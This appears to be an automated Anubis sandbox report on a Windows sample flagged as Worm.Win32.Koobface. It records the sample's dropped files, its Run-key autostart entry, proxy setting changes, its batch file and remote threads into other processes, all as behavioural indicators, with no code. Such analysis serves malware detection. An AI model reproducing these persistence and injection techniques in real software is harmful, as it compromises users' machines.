anubis left
Anubis - Analysis Report
anubis right

Analysis Report for b0e2f7d4c2281b965006fe8da742dba1

 Comment on this report

Summary:

Description Risk
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically. medium
Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web. medium
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users. medium
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. high
Spawns Processes: The executable produces processes during the execution. low
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys. low


Table of Contents
expand all expand all   collapse all collapse all

1. General Information

  - Information about Anubis' invocation  
Time needed: 244 s 
Report created: 03/20/09, 11:25:11 UTC 
Termination reason: Timeout 
Program version: 1.67.0 

1.a) - Network Activity

  -  Unknown UDP Traffic:  
from ANUBIS:1025 to 192.168.0.1:53
State: Normal establishment and termination - Transferred outbound Bytes: 94 - Transferred inbound Bytes: 411

2. sample.exe

  - General information about this executable  
Analysis Reason: Primary Analysis Subject 
Filename: sample.exe 
MD5: b0e2f7d4c2281b965006fe8da742dba1 
SHA-1: dd903395f2e7d2b04e5dc7e9b35760933cf29010 
File Size: 15360 Bytes
Command Line: "C:\sample.exe" 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​system32\​SHELL32.dll  0x7C9C0000  0x00817000 
C:\​WINDOWS\​system32\​SHLWAPI.dll  0x77F60000  0x00076000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​WinSxS\​x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\​comctl32.dll  0x773D0000  0x00103000 
C:\​WINDOWS\​system32\​comctl32.dll  0x5D090000  0x0009A000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Worm.Win32.Koobface (Sig-Id:469236)

2.a) sample.exe - Registry Activities

  - Registry Keys Created Or Opened:  
HKLM\​System\​CurrentControlSet\​Control\​Session Manager
HKLM\​System\​CurrentControlSet\​Control\​Session Manager

  - Registry Values Modified:  
Key Name New Value
HKLM\​System\​CurrentControlSet\​Control\​Session Manager  PendingFileRenameOperations  0x5c003f003f005c0043003a005c00730061006d0070006c0065002e006500 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

2.b) sample.exe - File Activities

  - Files Created:  
c:\353454543.bat
c:\windows\ld02.exe

  - Files Read:  
C:\sample.exe

  - Files Modified:  
c:\353454543.batinfo
c:\windows\ld02.exeinfo

  - Memory Mapped Files:  
File Name
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\cmd.exe
C:\Windows\AppPatch\sysmain.sdb
c:\353454543.bat
c:\windows\ld02.exe

2.c) sample.exe - Process Activities

  - Processes Created:  
Executable Command Line
c:\windows\ld02.exe   
  c:\windows\ld02.exe 
C:\WINDOWS\system32\cmd.exe   
  c:\353454543.bat 

  - Remote Threads Created:  
Affected Process
c:\windows\ld02.exe
C:\WINDOWS\system32\cmd.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\windows\ld02.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\windows\ld02.exe

3. ld02.exe

  - General information about this executable  
Analysis Reason: Started by sample.exe 
Filename: ld02.exe 
Command Line: c:\windows\ld02.exe 
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​system32\​SHELL32.dll  0x7C9C0000  0x00817000 
C:\​WINDOWS\​system32\​SHLWAPI.dll  0x77F60000  0x00076000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​WinSxS\​x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\​comctl32.dll  0x773D0000  0x00103000 
C:\​WINDOWS\​system32\​comctl32.dll  0x5D090000  0x0009A000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Normaliz.dll  0x008F0000  0x00009000 
C:\​WINDOWS\​system32\​iertutil.dll  0x42990000  0x00045000 
C:\​WINDOWS\​system32\​wininet.dll  0x42C10000  0x000CF000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​hnetcfg.dll  0x662B0000  0x00058000 
C:\​WINDOWS\​System32\​mswsock.dll  0x71A50000  0x0003F000 
C:\​WINDOWS\​System32\​wshtcpip.dll  0x71A90000  0x00008000 
C:\​WINDOWS\​system32\​sensapi.dll  0x722B0000  0x00005000 
C:\​WINDOWS\​system32\​MSCTF.dll  0x74720000  0x0004C000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​WINMM.dll  0x76B40000  0x0002D000 
C:\​WINDOWS\​system32\​rtutils.dll  0x76E80000  0x0000E000 
C:\​WINDOWS\​system32\​rasman.dll  0x76E90000  0x00012000 
C:\​WINDOWS\​system32\​TAPI32.dll  0x76EB0000  0x0002F000 
C:\​WINDOWS\​system32\​RASAPI32.dll  0x76EE0000  0x0003C000 
C:\​WINDOWS\​system32\​DNSAPI.dll  0x76F20000  0x00027000 
C:\​WINDOWS\​system32\​WLDAP32.dll  0x76F60000  0x0002C000 
C:\​WINDOWS\​System32\​winrnr.dll  0x76FB0000  0x00008000 
C:\​WINDOWS\​system32\​rasadhlp.dll  0x76FC0000  0x00006000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 

3.a) ld02.exe - Registry Activities

  - Registry Keys Deleted:  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​AppEvents\​Schemes\​Apps\​Explorer\​Navigating\​.Default
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​AppEvents\​Schemes\​Apps\​Explorer\​Navigating\​.Current
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​AppEvents\​Schemes\​Apps\​Explorer\​Navigating

  - Registry Values Modified:  
Key Name New Value
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Run  info sysldtray  c:\​windows\​ld02.exe 
HKLM\​SYSTEM\​CURRENTCONTROLSET\​HARDWARE PROFILES\​CURRENT\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info ProxyEnable 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Common AppData  C:\​Documents and Settings\​All Users\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Internet Explorer\​Main  info tp  1000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cookies  C:\​Documents and Settings\​user\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  History  C:\​Documents and Settings\​user\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  info SavedLegacySettings  0x460000006800000001000000000000000000000000000000040000000000 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SOFTWARE\​Microsoft\​CTF\​SystemShared\​  CUAS 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  UrlEncoding  0x00000000 
HKLM\​SYSTEM\​CurrentControlSet\​Services\​Winsock\​Parameters  Transports  0x5400630070006900700000004e0065007400420049004f00530000000000 
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Microsoft\​Tracing  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  ConsoleTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableFileTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileDirectory  %windir%\​tracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  MaxFileSize  1048576 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  AllUsersProfile  All Users 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  DefaultUserProfile  Default User 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  ProfilesDirectory  %SystemDrive%\​Documents and Settings 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileImagePath  %SystemDrive%\​Documents and Settings\​user 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  CommonFilesDir  C:\​Program Files\​Common Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  ProgramFilesDir  C:\​Program Files 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common AppData  %ALLUSERSPROFILE%\​Application Data 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  PerUserItem 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ComputerName\​ActiveComputerName  ComputerName  USER 
HKLM\​System\​CurrentControlSet\​Control\​MediaProperties\​PrivateProperties\​Joystick\​Winmm  wheel 
HKLM\​System\​CurrentControlSet\​Control\​ProductOptions  ProductType  WinNT 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  ComSpec  %SystemRoot%\​system32\​cmd.exe 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  FP_NO_HOST_CHECK  NO 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  NUMBER_OF_PROCESSORS 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  OS  Windows_NT 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PATHEXT  .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_ARCHITECTURE  x86 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_IDENTIFIER  x86 Family 6 Model 3 Stepping 3, GenuineIntel 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_LEVEL 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_REVISION  0303 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  Path  %SystemRoot%\​system32;%SystemRoot%;%SystemRoot%\​System32\​Wbem 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TEMP  %SystemRoot%\​TEMP 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TMP  %SystemRoot%\​TEMP 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  windir  %SystemRoot% 
HKLM\​System\​CurrentControlSet\​Services\​LDAP  LdapClientIntegrity 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Domain   
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Hostname  user 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  UseDomainNameDevolution 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  HelperDllName  %SystemRoot%\​System32\​wshtcpip.dll 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  Mapping  0x0b0000000300000002000000010000000600000002000000010000000000 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MaxSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MinSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  UseDelayedAcceptance 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters  WinSock_Registry_Version  2.0 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Num_Catalog_Entries 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  DisplayString  Tcpip 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  ProviderId  0x409d05229e7ecf11ae5a00aa00a7112b 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  SupportedNameSpace  12 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  DisplayString  NTDS 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  LibraryPath  %SystemRoot%\​System32\​winrnr.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  ProviderId  0xee37263b80e5cf11a55500c04fd8d4ac 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  SupportedNameSpace  32 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  DisplayString  Network Location Awareness (NLA) Namespace 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  ProviderId  0x3a244266a83ba64abaa52e0bd71fdd83 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  SupportedNameSpace  15 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Next_Catalog_Entry_ID  1012 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Num_Catalog_Entries  11 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000001  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000002  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000003  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000004  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
